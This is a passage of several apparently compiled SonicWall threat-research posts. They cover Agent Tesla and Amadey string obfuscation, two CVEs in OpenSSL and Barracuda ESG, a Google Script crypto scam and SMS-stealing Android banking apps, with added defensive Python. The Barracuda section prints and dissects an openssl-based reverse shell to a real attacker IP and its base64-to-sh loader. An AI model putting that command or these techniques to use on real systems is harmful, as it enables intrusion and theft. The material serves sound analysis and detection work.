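# Offset/size pairs as the malware's call sites would supply them to the decrypted array.
STRING_TABLE = {
    "browser_process": (0, 10),
    "smtp_host": (10, 20),
    "login_db": (30, 10),
}


def xor_decrypt(blob, key):
    """Mirror of the .cctor() routine: XOR every byte of the array with the one-byte key."""
    return bytes(b ^ key for b in blob)


def get_string(decrypted, offset, size):
    """Cut one string out of the decrypted array by offset and size (no separators exist)."""
    return decrypted[offset:offset + size].decode("utf-8")


def extract_all(blob, key, table):
    """Decrypt once and resolve every (offset, size) entry, as an automation script would."""
    decrypted = xor_decrypt(blob, key)
    return {name: get_string(decrypted, off, size) for name, (off, size) in table.items()}


def candidate_keys(blob, crib):
    """Key recovery when the hardcoded key is not yet known: try all 256 one-byte keys and
    keep those under which a known plaintext fragment (the crib, e.g. b".exe") appears."""
    return [k for k in range(256) if crib in xor_decrypt(blob, k)]


if __name__ == "__main__":
    keys = candidate_keys(ENCRYPTED_ARRAY, b".exe")
    print("candidate keys:", [hex(k) for k in keys])
    print(extract_all(ENCRYPTED_ARRAY, keys[0], STRING_TABLE))
```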

Version 4

In this version the Agent Tesla author has copied and abused the open-source .NET string encryption tool XorStringsNET.

In this version strings are stored as an encrypted data blob, with the format shown below.

As per .NET file format data blob is stored as field of structure as shown below.

Fig 12. Data blob stored as structure with size of =19953 bytes

Approach for string decryption

1) We can use the de4dot tool to decrypt the strings automatically and obtain a binary file in which the strings are decrypted. It comes with multiple options for manipulating .NET binaries.

Consider the command below as an example of decrypting the strings.

de4dot.exe -f file -o outfile --strtyp delegate --strtok 0x6000001

--strtok: the method token of the decryption method. It can be obtained easily using dnSpy.

Fig 13. de4dot cmdline options

--strtyp: the string decrypter type, which can be one of the types listed below.

Fig 14. String decrypter type available

2) Python scripts that parse the .NET metadata.

To write a Python script that decrypts the strings automatically, we need to locate the required data as follows:

  • .NET metadata: parse the metadata needed for string decryption, such as the method/structure token, the RVA and the file offset.

Many open-source .NET parsing libraries are available on GitHub.

Conclusion

Agent Tesla RAT has been active for several years and continues to evolve. It has developed new evasion techniques, such as the use of a native C++ loader. Agent Tesla successfully harvests data and exfiltrates it to the attacker. In each version Agent Tesla improves its string encryption functions and adds to its catalogue of data-stealing capabilities. We expect major improvements in its next version.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: AgentTesla.A (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

IOCs

D63FE952E90788072C6166A39BDE21B5 – NSIS Installer

B67E8512632AAE047A483B643EA6B1B4 – NSIS Plugin DLL

F8F2ED5A4E1FB2F14D49349CE4E2B779 – Encrypted Stage 2

57B264BF971F2BCF62140130CFD94CF5 – C++ Loader

A0A5B08B0EFFF9FAA96455B699893F76 – Agent Tesla

OpenSSL OBJ_obj2txt Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  OpenSSL stands as a renowned open-source library, primarily utilized for SSL and TLS. The Secure Socket Layer (SSL) and the Transport Layer Security (TLS), referenced interchangeably from this point onward, are cryptographic protocols designed to ensure communication security, data integrity, and authentication over TCP/IP networks. By harnessing the power of cryptography primitives—symmetric key ciphers, cryptographically robust hash functions, and the Public Key Infrastructure (PKI)—these protocols facilitate secure communication between hosts over unsecured networks.

  PKI, a prevalent authentication system for TLS, is dependent on certificates for conveying necessary cryptographic data, such as RSA keys, signatures, and identity information, all vital for encryption and authentication. The ITU standard, X.509, details the structure of these public-key certificates.

  There are three existing versions of X.509: X.509 v1 and v3 are older and newer standards, respectively, utilized for certificate representation. Conversely, X.509 v2 outlines the standard for representing Certificate Revocation Lists (CRLs). These certificate representations are outlined using Abstract Syntax Notation One (ASN.1) and encoded via the Distinguished Encoding Rules (DER).

  Recently, a denial-of-service vulnerability has been discovered in the OpenSSL library. This vulnerability emanates from delays encountered during the processing of ASN.1 OBJECT IDENTIFIERs.

  A remote attacker can exploit this vulnerability by transmitting specially crafted packets to an OpenSSL client, or a server that has purposefully activated client authentication. Should this exploitation prove successful, it could instigate denial-of-service conditions on the impacted service.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-2650.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 4.6 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:U/RL:O/RC:C).

  Base score is 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is none.
    • Impact of this vulnerability on data integrity is none.
    • Impact of this vulnerability on data availability is low.
  Temporal score is 4.6 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  It’s important to shed light on the OBJECT IDENTIFIER tag and its workings. The OBJECT IDENTIFIER data type, encoded into a TLV (Type, Length, Value) triplet, commences with a Tag value of 0x06. The encoding of each integer in a dotted decimal object identifier (OID) is governed by a set of specific rules. First and foremost, the OID’s initial two nodes are encoded onto a solitary byte, with the first node being multiplied by the decimal 40 and the result is added to the second node’s value. Secondly, node values that are either equal to or less than 127 are encoded on a single byte. Lastly, node values that are equal to or exceed 128 are encoded on multiple bytes, with Bit 7 of the leftmost byte set to one and Bits 0 through 6 of each byte containing the encoded value.

  For illustration, consider the OBJECT IDENTIFIER “1.3.6.1.4.1.311.21.20”. It would be encoded as follows: “06 09 2b 06 01 04 01 82 37 15 14”. Here, “06” stands for the OBJECT IDENTIFIER tag, “09” represents the length of the OBJECT IDENTIFIER, and the subsequent bytes are the encoded values, utilizing the previously mentioned three rules.

  The OpenSSL library supports parsing DER-encoded ASN.1 OBJECT IDENTIFIERs; more specifically, it provides the API OBJ_obj2txt() for this. The function starts decoding from the first byte, which it interprets as the two initial sub-identifiers, as per Rule 1. It then examines each byte of the remaining encoded data in a while loop. If the byte is less than 0x80 (128), its value is taken directly as the decimal sub-identifier, in line with Rule 2. If the byte equals or exceeds 0x80, the function discards bit 7, keeping only the remaining 7 bits (bits 6 through 0), and repeats this step in a for loop until a byte less than 0x80 is encountered. It then concatenates the lower 7 bits of all these bytes and converts the bit stream into an integer, whose decimal value is the sub-identifier. However, the function imposes no restriction on the length of the encoded OBJECT IDENTIFIER data. Consequently, the decoding step can be extremely time-consuming if the concatenated value forms a very large integer.
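The three encoding rules and the decoding loop above, as an added Python example (constructed here; this is not OpenSSL's code): an encoder that reproduces the “1.3.6.1.4.1.311.21.20” example byte for byte, and a decoder that differs from the OBJ_obj2txt() behaviour described in one respect, a cap on how many base-128 bytes a single sub-identifier may span, so an over-long run is rejected instead of being accumulated into an arbitrarily large integer. In DER, bit 7 is set on every byte of a multi-byte sub-identifier except the last, which the encoder follows. The MAX_SUBID_BYTES limit and the overlong_subid_fixture helper are constructed for the example.

```python
"""Constructed example: DER OBJECT IDENTIFIER encoding and a bounded decoder.
Not OpenSSL's code; it implements the three encoding rules above and, unlike
the OBJ_obj2txt() behaviour described, caps the number of base-128 bytes one
sub-identifier may span so an over-long run is rejected up front."""

from typing import List

OID_TAG = 0x06
# Constructed limit for this example: 10 base-128 bytes hold any 64-bit
# sub-identifier, far more than any real OID arc needs.
MAX_SUBID_BYTES = 10


def _encode_subid(sid: int) -> bytes:
    """Rule 2: values below 128 take one byte. Rule 3: larger values are split
    into 7-bit groups, most significant first, bit 7 set on all but the last."""
    groups = [sid & 0x7F]
    sid >>= 7
    while sid:
        groups.append(0x80 | (sid & 0x7F))
        sid >>= 7
    return bytes(reversed(groups))


def encode_oid(dotted: str) -> bytes:
    """Encode a dotted-decimal OID as a complete TLV (tag, length, value)."""
    nodes = [int(n) for n in dotted.split(".")]
    if len(nodes) < 2 or nodes[0] > 2 or (nodes[0] < 2 and nodes[1] > 39):
        raise ValueError("invalid leading arcs")
    # Rule 1: the first two nodes share one sub-identifier, first*40 + second.
    subids = [nodes[0] * 40 + nodes[1]] + nodes[2:]
    value = b"".join(_encode_subid(s) for s in subids)
    if len(value) > 127:
        raise ValueError("long-form lengths are outside this example")
    return bytes([OID_TAG, len(value)]) + value


def decode_oid(der: bytes, max_subid_bytes: int = MAX_SUBID_BYTES) -> str:
    """Decode a TLV OBJECT IDENTIFIER, refusing any sub-identifier that spans
    more than max_subid_bytes bytes instead of accumulating it."""
    if len(der) < 3 or der[0] != OID_TAG:
        raise ValueError("not an OBJECT IDENTIFIER")
    length = der[1]
    if length & 0x80 or len(der) != 2 + length:
        raise ValueError("bad length")
    value = der[2:]
    subids: List[int] = []
    i = 0
    while i < len(value):
        acc, nbytes = 0, 0
        while True:
            if i >= len(value):
                raise ValueError("truncated sub-identifier")
            b = value[i]
            i += 1
            nbytes += 1
            if nbytes > max_subid_bytes:
                raise ValueError("sub-identifier too long")
            acc = (acc << 7) | (b & 0x7F)   # keep bits 6..0, drop bit 7
            if not b & 0x80:                 # last byte of this sub-identifier
                break
        subids.append(acc)
    first = subids[0]                        # undo Rule 1
    if first < 40:
        arcs = [0, first]
    elif first < 80:
        arcs = [1, first - 40]
    else:
        arcs = [2, first - 80]
    return ".".join(str(a) for a in arcs + subids[1:])


def overlong_subid_fixture(nbytes: int) -> bytes:
    """Constructed test input: '1.3' followed by one sub-identifier that spans
    nbytes bytes (nbytes-1 continuation bytes and a final byte without bit 7)."""
    value = bytes([0x2B]) + bytes([0xFF] * (nbytes - 1)) + bytes([0x7F])
    return bytes([OID_TAG, len(value)]) + value
```

The fixture with five bytes decodes to a 35-bit arc (1.3.34359738367) and is accepted; one with forty bytes is refused before any multiplication happens, which is the behaviour a bounded parser should have.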

Triggering the Problem:

  • The target must be running a vulnerable version of the affected product.
  • The attacker must have the ability to deliver a malicious ASN.1 DER file to the target.

Triggering Conditions:

  The vulnerability can be exploited if the attacker successfully delivers a malicious certificate or any other file in DER format to applications utilizing the OpenSSL library. The vulnerability is subsequently triggered upon the parsing of this malicious file, establishing a potential security risk for the system.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • FTP
    • HTTP
    • HTTPS
    • IMAP
    • NFS
    • POP3
    • SMB/CIFS
    • SMTP
    • ESMTP
    • SIPS

  Get Request:
  

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS:19207 OpenSSL OBJ_obj2txt Function DoS

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor-provided patch to eliminate the vulnerability.
    • Filtering attack traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Google script being abused for Cryptocurrency fraud

SonicWall Capture Labs Research team has discovered an ongoing instance of cryptocurrency fraud that utilizes legitimate Google services, specifically Google Script macros. Threat actors intentionally target these platforms because they are both convenient to use and malicious code can evade detection by anti-malware systems.

Google Script macros are primarily designed to enhance productivity and streamline workflows within Google services. However, threat actors are now exploiting them for fraudulent purposes, finding ways to execute malicious code within the context of legitimate Google applications.

In this case, a PDF file is being circulated, containing a malicious URL that was created using Google Script. Once the user interacts with this URL, they are redirected to the actual fraudulent website.

Fig: PDF File

 

Below shown the response to the malicious URL using Google Script Macro.

Fig: Fiddler capture of malicious Google Script Macro

 

When the URL in the PDF file is opened, it shows Google’s message that this application was created by another user, not by Google. Clicking on the webpage redirects to office[.]proprogramvipt[.]top.

Fig: Google script malicious URL

 

After the redirection, the user is confronted on this deceptive webpage with a warning message indicating that their account is at risk of deletion due to inactivity. To add a sense of urgency, a countdown timer is displayed, suggesting that the account will be deleted imminently.

To prevent the account deletion and purportedly withdraw the funds (which, in reality, are non-existent), the user is instructed to sign in.

Fig: Warning for account deletion

 

Upon signing in, the user is presented with a prepopulated sign-in page that appears legitimate. The page is carefully designed to show an enticing welcome-back message, which includes the user’s Bitcoin balance in both BTC and USD. This serves as bait to lure the user into continuing with the process.

Fig: Sign-in & welcome message

 

To create an illusion of authenticity, various elements that mimic legitimate features commonly found on cryptocurrency platforms are presented. These elements include:

History: A fabricated transaction history is displayed, showcasing previous transactions to make the platform appear genuine.

User Chat: Fictitious comments and messages from fake users are shown, attempting to simulate user activity and engagement on the platform.

Settings: Users are provided with an option to collect bitcoins, along with the ability to change their password. This is aimed at giving the impression of user control and customization.

News: Fake news articles are presented, falsely claiming updates such as a switch to a new cryptocurrency system, the addition of PayPal payouts, or technical server-related updates. These news pieces aim to instill a sense of credibility and innovation.

All of these elements are carefully designed to create an atmosphere of legitimacy and trust, further deceiving users into believing that the fraudulent platform is genuine and reliable.

 

Fig: News, Settings, Chat & History

 

It shows the current balance in BTC & USD with a button to collect bitcoin bonuses.

 

Fig: Collect BTC Bonuses

 

After clicking the “Collect Bitcoin Bonuses” button, it shows a progress bar, as if mining were taking place on the system, along with fake transaction hashes.

Fig: Fake mining

 

Once the progress bar reaches 100% it shows collected BTC and a get paid button.

 

Fig: BTC collection

 

After clicking get paid it asks for the user’s personal details along with account/card details.

 

Fig: User’s details

 

After collecting all the details, it shows the details being forwarded to a manager. The site has its own chatbot, which reports the details as verified without any validation, even if random input is given.

Fig: Chatbot

Then, for the currency exchange, it redirects to BTCPay and the user has to pay in bitcoin.

 

Fig: BTCPay

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: CryptoFraud.A (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

 

Indicators of Compromise (IOC):

671ea7c95223fc15b2dbe03bc55acc44d81f0f69c1a3686c9f8db174df3e2710

Barracuda ES Gateway Reverse Shell Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  The Barracuda Email Security Gateway is a comprehensive email security solution developed to safeguard businesses from a multitude of email threats such as spam, viruses, phishing, DoS attacks, and data leaks. It is available in physical and virtual forms and offers thorough inbound and outbound email filtering, data leak prevention, and email encryption. It also boasts advanced features like protection against sophisticated threats like ransomware and zero-day attacks. In addition, it employs an outbound filtering system to avert data loss and uphold the reputation of your email server’s IP address.

  The appliance form factor of the Barracuda Email Security Gateway pertains to its physical variant, a standalone device installable directly into an organization’s network infrastructure.

  A remote command injection vulnerability has been discovered in the Barracuda Email Security Gateway product, affecting versions 5.1.3.001 to 9.2.0.006. This vulnerability stems from an insufficient sanitization process of .tar files (tape archives).

  This vulnerability could be exploited by a remote, unauthenticated attacker by sending a specially crafted TAR file to the targeted device. A successful attack could result in a reverse shell against the targeted server, thus compromising its security.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-2868.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.8 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  Inside the TAR file, you will see the following string:
  
  The script provided is a shell command that decodes a base64 encoded string and then executes the result. Here’s a detailed breakdown of what the command does:

  • abcdefg=: This sets the variable abcdefg to a base64 encoded string.
  • ee=ba: This sets the variable ee to the string ba.
  • G=s: This sets the variable G to the string s.
  • "ech"o $abcdefg|${ee}se64 -d|${G}h: This part of the command is using some obfuscation. If we substitute ee with ba and G with s, we get "ech"o $abcdefg | base64 -d | sh.
    1. "ech"o $abcdefg: This echoes the base64 encoded string stored in abcdefg.
    2. base64 -d: This decodes the base64 encoded string.
    3. sh: This executes the resulting decoded command string using sh.
  • wh66489.txt: This command doesn’t seem to have any context related to the rest of the script and it doesn’t appear to be a valid command by itself. If it was intended to redirect the output to a file named wh66489.txt, then it would require a > before the filename like this > wh66489.txt.

 If we decode the base64 string abcdefg using the command "ech"o $abcdefg | base64 -d, we get:

 This command is creating a reverse shell that connects to a specified host 107.148.223.196:443 over a secure SSL/TLS connection.

 The breakdown of the reverse shell commands:

  • setsid: This command is used to run a new session in Unix and Unix-like operating systems. This ensures that the command continues running even if the terminal is closed.
  • sh -c: The sh -c command is used to run a shell (sh) with a command string (-c option). Here, the string within the quotes is the command string that sh is going to execute.
  • mkfifo /tmp/p: The mkfifo command creates a named pipe with the name /tmp/p. Pipes are used to direct the output from one command as input to another. Named pipes, like /tmp/p, can be used by multiple processes for communication.
  • sh -i < /tmp/p 2>&1|openssl s_client -quiet -connect 107.148.223.196:443 > /tmp/p 2>/dev/null: This is a compound command.
    1. sh -i < /tmp/p 2>&1: The sh -i command starts an interactive shell. The < /tmp/p redirects the input of this shell from the named pipe we created earlier.
    2. The 2>&1 redirects standard error (2) to standard output (1).
    3. Therefore, both the error messages and standard output from the sh -i command are sent to the pipe /tmp/p.
    4. The | character pipes the output from the preceding command as the input to the next command.
    5. openssl s_client -quiet -connect 107.148.223.196:443: The openssl s_client command starts a SSL/TLS client that connects to an SSL/TLS server. The -quiet option suppresses most of the output. The -connect option specifies the host and port to connect to, here 107.148.223.196:443.
    6. > /tmp/p 2>/dev/null: This part is redirecting the standard output to the named pipe (/tmp/p) and discarding the standard error by directing it to /dev/null.
  • rm /tmp/p: Finally, after the connection is terminated, this command removes the named pipe /tmp/p.

 The overall purpose of this command is to create a reverse shell that connects to a specified host 107.148.223.196:443 over a secure SSL/TLS connection. The connection is kept alive even if the terminal is closed due to the setsid command.
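The quoting and variable tricks broken down above (a split-quoted command name, variables standing in for fragments of base64 and sh, and an echo | base64 -d | sh pipeline) are what a triage script has to see through before it can tell what a dropper stages. The following is an added Python example, constructed here and not SonicWall's tooling or the attacker's script: it resolves the assignments and quoting statically, splits the result into pipeline stages, flags a base64-decode stage that feeds a shell, and recovers the staged payload, without executing anything. The SAMPLE string is constructed in the same shape as the one-liner above, with a harmless payload that decodes to a plain echo in place of the real one; the ';' statement separator is an assumption of the example.

```python
"""Static normalisation of the obfuscated shell one-liner pattern described
above. Constructed example: it resolves split-quoted words ("ech"o), variables
that stand in for command-name fragments (${ee}se64) and the echo|base64 -d|sh
pipeline, and recovers the staged payload without executing anything."""

import base64
import re
import shlex
from typing import Dict, List, Optional

VAR_RE = re.compile(r"\$\{(\w+)\}|\$(\w+)")   # ${name} or $name
ASSIGN_RE = re.compile(r"^(\w+)=(.*)$")      # name=value statement
SHELLS = {"sh", "bash", "dash", "ash"}

# Constructed sample in the same shape as the one-liner above. The base64
# payload is a harmless stand-in (it decodes to a plain echo), not the real one.
PAYLOAD_TEXT = "echo constructed-sample"
SAMPLE = (
    "abcdefg=" + base64.b64encode(PAYLOAD_TEXT.encode()).decode()
    + ';ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h'
)


def _substitute(text: str, env: Dict[str, str]) -> str:
    """Replace ${name}/$name with values from assignments seen earlier."""
    def repl(m: "re.Match[str]") -> str:
        name = m.group(1) or m.group(2)
        return env.get(name, m.group(0))
    return VAR_RE.sub(repl, text)


def _tokens(text: str) -> List[str]:
    """Tokenize like a POSIX shell: "ech"o collapses to echo, '|' stands alone."""
    lex = shlex.shlex(text, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def normalize(script: str) -> List[List[str]]:
    """Apply assignments and return each remaining command as a token list.
    Statements are split on ';' only, which is enough for this pattern."""
    env: Dict[str, str] = {}
    commands: List[List[str]] = []
    for stmt in script.split(";"):
        stmt = stmt.strip()
        if not stmt:
            continue
        m = ASSIGN_RE.match(stmt)
        if m:
            env[m.group(1)] = m.group(2).strip("\"'")
            continue
        commands.append(_tokens(_substitute(stmt, env)))
    return commands


def _stages(tokens: List[str]) -> List[List[str]]:
    """Split a token list on '|' into pipeline stages."""
    stages: List[List[str]] = [[]]
    for tok in tokens:
        if tok == "|":
            stages.append([])
        else:
            stages[-1].append(tok)
    return stages


def analyze(script: str) -> Dict[str, object]:
    """Flag an 'echo <b64> | base64 -d | sh' pipeline and recover its payload."""
    normalized: List[str] = []
    base64_to_shell = False
    decoded: Optional[str] = None
    for tokens in normalize(script):
        normalized.append(" ".join(tokens))
        stages = _stages(tokens)
        for i, stage in enumerate(stages):
            if not stage or stage[0] != "base64" or not ({"-d", "--decode"} & set(stage)):
                continue
            nxt = stages[i + 1] if i + 1 < len(stages) else []
            if nxt and nxt[0] in SHELLS:
                base64_to_shell = True          # decoded bytes go straight to a shell
            prev = stages[i - 1] if i > 0 else []
            if prev and prev[0] == "echo":
                try:
                    raw = base64.b64decode("".join(prev[1:]), validate=True)
                    decoded = raw.decode("utf-8", "replace")
                except ValueError:              # binascii.Error is a ValueError subclass
                    pass
    return {"normalized": normalized, "base64_to_shell": base64_to_shell,
            "decoded_payload": decoded}
```

The normaliser deliberately stops at the pattern shown on this page (simple assignments, ';' separators, one pipeline); real droppers vary the tricks, so the point is the approach, resolve the obfuscation statically and then match on the de-obfuscated form, rather than the exact regexes.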

Triggering the Problem:

  • The target system must have the Barracuda Email Security Gateway versions 5.1.3.001-9.2.0.006.
  • The attacker must have network connectivity to the affected ports.
  • The attacker must send malicious attachments designed to exploit CVE-2023-2868 to gain initial access.

Triggering Conditions:

  For emails targeting Barracuda Email Security Gateway middleboxes and transmitted over SMTP or ESMTP, it is crucial to attach files with the extension ".tar" in their filename. Alternatively, using other extensions such as ".jpg" or ".dat" is acceptable, as long as they contain valid ".tar" file content for exploitation.

  Note that ".tar" file attachments crafted as valid exploits have the potential to execute a reverse shell payload on certain ESG appliances during the email attachment screening process.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • SMTP
    • ESMTP
  Exploit-chain-related malware components will be installed over HTTP/HTTPS.

  Reverse Shell File Content:
  

SonicWall Capture Labs provides protection against this threat:

  • GAV: 18479 CVE-2023-2868.A

  • GAV: 17928 Saltwater.A

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Filtering traffic based on the signature above.
    • Upgrading the product to a non-vulnerable version.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory #1
  Vendor Advisory #2

Minimal permissions are adequate for fraudulent Android financial applications

SonicWall Capture Labs Threat Research team recently discovered a campaign that asks users to provide their card details in a fraudulent bank application under the pretense of claiming reward points. The campaign also persuades users to enable SMS-related permissions, which gives the fraudulent application the capability to intercept One-Time Password (OTP) messages and redirect them to the attackers’ server, giving them unauthorized access to the user’s banking credentials and potentially leading to fraudulent activity or financial loss.

The fraudulent app’s icon may closely resemble the original app’s icon in terms of color scheme, logo, and overall visual elements. This resemblance creates a false sense of trust and familiarity for unsuspecting users. They may not immediately recognize any visual discrepancies and may proceed with providing their card details without suspicion.

Fig1: Legitimate & malicious apps icon

Infection cycle:

The fraudulent apps utilize two crucial permissions.

  1. SMS permission: to read and identify incoming messages (the bank’s two-factor authentication codes).
  2. INTERNET permission: to establish an internet connection and send the collected card and SMS details to the attacker’s server.
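The two permissions above are visible in the APK's manifest before the app is ever run, which makes them a cheap triage signal. The following is an added Python example, constructed here and not code from the fraudulent app or from SonicWall: it parses constructed AndroidManifest.xml samples and flags the SMS-plus-INTERNET combination, an SMS permission an app's stated purpose does not justify, and a receiver registered for the SMS_RECEIVED broadcast. The permission and action names are the standard Android ones; both manifests are constructed.

```python
"""Constructed example: triage of an Android manifest for the permission
combination described above (SMS access plus INTERNET) and for a receiver
that listens for incoming SMS. Not code from the fraudulent app."""

import xml.etree.ElementTree as ET
from typing import List, Set

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = f"{{{ANDROID_NS}}}name"
SMS_PERMS = {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS"}
INTERNET = "android.permission.INTERNET"
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"

# Constructed manifests, not extracted from any real APK.
SUSPICIOUS_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.constructed.bankclone">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <application android:label="Constructed Rewards">
        <receiver android:name=".SmsReceiver" android:exported="true">
            <intent-filter android:priority="999">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>"""

BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.constructed.viewer">
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:label="Constructed Viewer"/>
</manifest>"""


def requested_permissions(manifest_xml: str) -> Set[str]:
    """All <uses-permission> names declared at the top level of the manifest."""
    root = ET.fromstring(manifest_xml)
    return {el.get(NAME_ATTR, "") for el in root.findall("uses-permission")}


def sms_receivers(manifest_xml: str) -> List[str]:
    """Names of receivers whose intent filters include SMS_RECEIVED."""
    root = ET.fromstring(manifest_xml)
    hits: List[str] = []
    for receiver in root.iter("receiver"):
        actions = {a.get(NAME_ATTR) for a in receiver.iter("action")}
        if SMS_RECEIVED in actions:
            hits.append(receiver.get(NAME_ATTR, "?"))
    return hits


def triage(manifest_xml: str, app_needs_sms: bool = False) -> List[str]:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings: List[str] = []
    perms = requested_permissions(manifest_xml)
    sms = perms & SMS_PERMS
    if sms and not app_needs_sms:
        findings.append(f"requests SMS permissions not justified by the app's purpose: {sorted(sms)}")
    if sms and INTERNET in perms:
        findings.append("SMS access combined with INTERNET: OTPs can be read and sent off-device")
    for name in sms_receivers(manifest_xml):
        findings.append(f"receiver {name} listens for SMS_RECEIVED: sees OTPs as they arrive")
    return findings
```

A rewards or banking-lookalike app has no reason to read SMS, so app_needs_sms stays False for that category; the same check would be tuned differently for a messaging client.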

After installation, it prompts the user to fill in their card details, enticing them with the promise of claiming rewards.

Fig2: Card details with random values

 

Fig3: Prompt for Card details

 

Fig4: Prompt for Card details

 

Fig5: Checks for SMS permission

 

Once the user shares their card details with the fraudulent app, it immediately initiates the process of transmitting this sensitive information to the attacker’s C&C server.

Fig6: Sharing card details with C&C server

 

It stores the user and card information in a local database located within the application’s system folder.

Fig7: Application system folder


Fig8: Storing user info in a local database

 

It reads incoming messages on the device and saves them in JSON format.

Fig9: Read incoming SMS

 

Fig10: Stores SMS info in a JSON format

 

It shares incoming message details with the C&C server.

Fig11: Sends SMS info to the C&C server

 

At the time of writing, the file is detected by only a few security vendors on the popular threat intelligence sharing portal VirusTotal, which indicates its potential to spread.

Fig12: VirusTotal image

 

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

Indicators of Compromise (IOC):

 

01dad4cb5fd433b1138078d39d7ced11229d22971acc4ba71bb03eb09e5b702b

0901a1d1b25ed81a6100d5e9e4a8363e9a638e45ae4a418d80e78189c01510ec

14732a80ea580c54b88780c3346b95a58d1dad80e1ed60800018c76746caa421

17ccf51b19072810490319b20d5d337c9621405e443c73fa2ec96c8d04038d6c

1825679fb5840bd63002a28656a69bd6bac120cb3d0d2dee9c396b198b5db109

35eeaeea8d91cc999456d4f86330ea03beed3c53274c1525f541341b2a46bf4e

36c61e92e4f991339340d9b89a891c5c74ef043ee362df5173e8e50c617f1372

6e9f03a81be3b29be22f769b6a00e4f8ee5220884959d91c84906e163dbb592c

6ff0c6f8b54142b76d6acc3a1f7e2dc5fc9955bb92b4adea86e8d3e69c0f9399

8f088d49c70b1d64b3ab8df0b2e4e527d1bad8865cf609bc0801acfbf3b1bd15

9cf21cfb921658c85ec63c362bfb71c5137e56c93caeab9ec0b2798bcbeeea6f

cec60348cf2be5400b37597ba8903453f12aef5a936aabad85cce13320cc59ee

ddfe903d31c87f49c02fbb4e5b63351964e55c8ef12a8fa5500e5471236d10f2

e740a368bbfc74b32eddfe57282094100a66a7a11f31181a262c40914e9449dd

ec409e8f9bb9d19b786e3e0f99f863d97da8465b7b2569bbd88a83f4ec439880

f9d94528bdb34628c9169bc3770c8d087afd5793d47247eb84e7fa60ead17534

Amadey Malware Has Improved Its String Decoding Algorithm

OVERVIEW

SonicWall Capture Labs Research team recently observed a new variant of the Amadey malware. Amadey is a botnet whose main objective is to steal sensitive information and to inject additional payloads according to commands received from its command and control server. In this variant we observed that the string decoding algorithm has been modified.

In this blog post, we will discuss:

  • Introduction to Amadey malware.
  • Command & control server communication.
  • New string decoding algorithm.

INTRODUCTION

The Amadey botnet has been operational since its initial discovery in October 2018. Amadey is mostly propagated by exploit kits such as RigEK and Fallout EK. The Amadey version found in the current sample is 3.83.

Fig 1: Amadey CnC Login Panel

C2 COMMUNICATION

The malware starts by collecting the victim’s system information and initiates communication with the CnC server by sending the collected information. The victim’s system information includes the computer name, username, operating system, domain name, installed anti-virus vendor, system architecture and whether admin privileges are present.

In response to the request, the CnC can send a URL from which to download additional malware. In this variant, it was seen distributing the Redline stealer malware. Amadey sends requests to download two data-stealing plugins named cred.dll and clip64.dll.

Fig 2: Downloads add-on Plugins

STRINGS OBFUSCATION

The malware stores all the strings it uses, such as the CnC domain address, AV product names, DLL file names, registry keys used for persistence, API names and URL parameters, in encoded form. The encoded strings are present in the “.rdata” section of the malware.

Fig 3: Some of Encoded Strings

HARD CODED KEY

Fig 4: Hardcoded Decryption key, Mutex name, Amadey ID

IMPROVED STRING ENCODING ALGORITHM

